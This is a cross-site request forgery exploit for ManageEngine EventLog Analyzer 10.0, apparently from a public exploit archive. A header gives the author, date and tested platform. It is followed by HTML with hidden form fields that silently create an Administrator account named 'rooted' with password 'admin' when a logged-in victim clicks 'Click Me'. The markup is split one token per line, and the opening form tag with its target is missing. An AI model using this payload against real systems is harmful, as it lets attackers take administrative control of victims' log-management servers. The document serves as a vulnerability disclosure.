<!--
[+] Exploit Title: ManageEngine EventLog Analyzer Version 10.0 Cross Site
Request Forgery Exploit
[+] Date: 31/03/2015
[+] Exploit Author: Akash S. Chavan
[+] Vendor Homepage: https://www.manageengine.com/
[+] Software Link:
https://download.manageengine.com/products/eventlog/91517554/ManageEngine_EventLogAnalyzer_64bit.exe
[+] Version: Version: 10.0, Build Number: 10001
[+] Tested on: Windows 8.1/PostgreSQL
-->
<
html
>
<
body
>
<
input
type
=
"hidden"
name
=
"domainId"
value
=
""
/>
<
input
type
=
"hidden"
name
=
"roleId"
value
=
""
/>
<
input
type
=
"hidden"
name
=
"addField"
value
=
"true"
/>
<
input
type
=
"hidden"
name
=
"userType"
value
=
"Administrator"
/>
<
input
type
=
"hidden"
name
=
"userName"
value
=
"rooted"
/>
<
input
type
=
"hidden"
name
=
"pwd1"
value
=
"admin"
/>
<
input
type
=
"hidden"
name
=
"password"
value
=
"admin"
/>
<
input
type
=
"hidden"
name
=
"userGroup"
value
=
"Administrator"
/>
<
input
type
=
"hidden"
name
=
"email"
value
=
""
/>
<
input
type
=
"hidden"
name
=
"AddSubmit"
value
=
"Add User"
/>
<
input
type
=
"hidden"
name
=
"alpha"
value
=
""
/>
<
input
type
=
"hidden"
name
=
"userIds"
value
=
""
/>
<
input
type
=
"hidden"
name
=
"roleName"
value
=
""
/>
<
input
type
=
"hidden"
name
=
"selDevices"
value
=
""
/>
<
input
type
=
"hidden"
name
=
"doAction"
value
=
""
/>
<
input
type
=
"hidden"
name
=
"productName"
value
=
"eventlog"
/>
<
input
type
=
"hidden"
name
=
"licType"
value
=
"Prem"
/>
<
input
type
=
"hidden"
name
=
"next"
value
=
""
/>
<
input
type
=
"hidden"
name
=
"currentUserId"
value
=
"1"
/>
<
input
type
=
"hidden"
name
=
"isAdminServer"
value
=
"false"
/>
<
input
type
=
"submit"
value
=
"Click Me"
/>
</
form
>
</
body
>
</
html
>